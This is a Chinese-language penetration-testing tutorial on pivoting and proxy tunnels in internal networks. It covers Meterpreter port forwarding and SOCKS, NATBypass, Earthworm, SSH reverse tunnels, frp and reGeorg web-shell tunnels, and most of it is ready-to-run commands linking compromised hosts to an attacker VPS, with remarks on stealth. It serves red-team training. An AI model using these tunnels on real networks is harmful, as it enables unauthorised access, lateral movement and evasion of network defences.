内网渗透代理技术详解<\/h1>

1. Meterpreter代理技术<\/h2>

1.1 portfwd端口转发<\/h3>
portfwd用于转发单个端口，适合目标明确的情况（如只需访问目标的3389端口）。<\/p>
基本命令：<\/strong><\/p>
meterpreter > portfwd add -l 7003<\/span> -p 3389<\/span> -r 192.168.52.138
<\/span><\/span># -l: 服务器监听端口<\/span>
<\/span><\/span># -p: 内网主机需转发端口<\/span>
<\/span><\/span># -r: 目标内网主机IP<\/span>
<\/span><\/span>
<\/span><\/span>meterpreter > portfwd delete -l 3389<\/span> -p 3389<\/span> -r 172.16.194.191
<\/span><\/span># 删除转发<\/span>
<\/span><\/span>
<\/span><\/span>meterpreter > portfwd list
<\/span><\/span># 列出当前转发端口<\/span>
<\/span><\/span>
<\/span><\/span>meterpreter > portfwd flush
<\/span><\/span># 移除所有转发端口<\/span>
<\/span><\/span><\/code><\/pre>1.2 socks代理<\/h3>
设置流程：<\/strong><\/p>

添加路由：<\/li>
<\/ol>
meterpreter > run get_local_subnets
<\/span><\/span>meterpreter > run autoroute -s 192.168.21.0\/24
<\/span><\/span>meterpreter > run autoroute -p  # 查看路由<\/span>
<\/span><\/span>meterpreter > route flush  # 删除路由<\/span>
<\/span><\/span><\/code><\/pre>
ARP扫描内网存活主机：<\/li>
<\/ol>
meterpreter > run post\/windows\/gather\/arp_scanner RHOSTS=<\/span>192.168.21.0\/24
<\/span><\/span><\/code><\/pre>
建立socks4代理：<\/li>
<\/ol>
meterpreter > background
<\/span><\/span>msf5 exploit(<\/span>multi\/handler)<\/span> > use auxiliary\/server\/socks4a
<\/span><\/span>msf5 auxiliary(<\/span>server\/socks4a)<\/span> > set srvhost 127.0.0.1
<\/span><\/span>msf5 auxiliary(<\/span>server\/socks4a)<\/span> > set srvport 1080<\/span>
<\/span><\/span>msf5 auxiliary(<\/span>server\/socks4a)<\/span> > run
<\/span><\/span><\/code><\/pre>
配置proxychains使用代理<\/li>
<\/ol>
socks5代理<\/strong>类似，但需要额外设置用户名和密码。<\/p>
2. NATBypass工具<\/h2>
NATBypass是golang版lcx，可用于端口转发。<\/p>
使用方法：<\/strong><\/p>

公网VPS执行：<\/li>
<\/ol>
nb -listen 1997<\/span> 2017<\/span>
<\/span><\/span><\/code><\/pre>
内网主机执行：<\/li>
<\/ol>
nb -slave 127.0.0.1:3389 x.x.x.x:1997
<\/span><\/span># x.x.x.x是公网VPS的IP<\/span>
<\/span><\/span><\/code><\/pre>
本地直接访问VPS的2017端口即可连接内网3389<\/li>
<\/ol>
3. SSH隧道技术<\/h2>
3.1 公网主机建立SOCKS隧道<\/h3>
ssh -N -f -D 9070<\/span> x.x.x.x
<\/span><\/span><\/code><\/pre>配置proxychains或浏览器代理到127.0.0.1:9070<\/p>
3.2 穿透两个内网<\/h3>
在目标内网主机执行：<\/p>
ssh -qTfNn -R 2222:localhost:22 JumpHost
<\/span><\/span><\/code><\/pre>在公网主机执行：<\/p>
ssh -p 2222<\/span> localhost
<\/span><\/span><\/code><\/pre>4. Earthworm (EW)工具<\/h2>
反向代理方法：<\/strong><\/p>

公网VPS执行：<\/li>
<\/ol>
.\/ew_for_linux64 -s rcsocks -l 7010<\/span> -e 7011<\/span>
<\/span><\/span><\/code><\/pre>
目标内网主机执行：<\/li>
<\/ol>
.\e<\/span>w_for_Win.exe -s rssocks -d x.x.x.x -e 7011<\/span>  # Windows<\/span>
<\/span><\/span>.\/ew_for_linux64 -s rssocks -d x.x.x.x -e 7011<\/span>  # Linux<\/span>
<\/span><\/span><\/code><\/pre>
本地通过proxychains或浏览器设置socks5代理至VPS的7011端口<\/li>
<\/ol>
5. frp反向代理<\/h2>
配置方法：<\/strong><\/p>

公网VPS frps.ini配置：<\/li>
<\/ol>
[common]<\/span>
<\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span>
<\/span><\/span>token<\/span> =<\/span> password<\/span>
<\/span><\/span><\/code><\/pre>启动：<\/p>
.\/frps -c .\/frps.ini
<\/span><\/span><\/code><\/pre>
内网主机frpc.ini配置：<\/li>
<\/ol>
[common]<\/span>
<\/span><\/span>server_addr<\/span> =<\/span> x.x.x.x<\/span>
<\/span><\/span>server_port<\/span> =<\/span> 7000<\/span>
<\/span><\/span>token<\/span> =<\/span> password<\/span>
<\/span><\/span>
<\/span><\/span>[socks5]<\/span>
<\/span><\/span>type<\/span> =<\/span> tcp<\/span>
<\/span><\/span>remote_port<\/span> =<\/span> 7004<\/span>
<\/span><\/span>plugin<\/span> =<\/span> socks5<\/span>
<\/span><\/span><\/code><\/pre>启动：<\/p>
.\/frpc -c .\/frpc.ini
<\/span><\/span><\/code><\/pre>
本地配置proxychains：<\/li>
<\/ol>
socks5 x.x.x.x 7004<\/span>
<\/span><\/span><\/code><\/pre>6. 基于Web服务的socks5隧道<\/h2>
使用工具如reGeorg、reDuh、Tunna等。<\/p>
reGeorg使用方法：<\/strong><\/p>

上传对应网站语言的脚本到目标服务器<\/li>
访问确认脚本正常运行（显示"Georg says, 'All seems fine'"）<\/li>
本地执行：<\/li>
<\/ol>
python2 reGeorgSocksProxy.py -p 7001<\/span> -u http:\/\/url\/tunnel.php
<\/span><\/span><\/code><\/pre>
配置proxychains使用127.0.0.1:7001<\/li>
<\/ol>
关键点总结<\/h2>

Meterpreter的portfwd适合单端口转发，socks代理适合多端口访问<\/li>
NATBypass和EW适合无meterpreter环境下的代理<\/li>
SSH隧道是最隐蔽但需要SSH访问权限的方法<\/li>
frp稳定但配置文件容易被溯源<\/li>
Web隧道适合有Web服务器权限但无其他权限的情况<\/li>
<\/ol>
根据实际环境选择合适的代理方法，考虑隐蔽性、稳定性和权限要求。<\/p>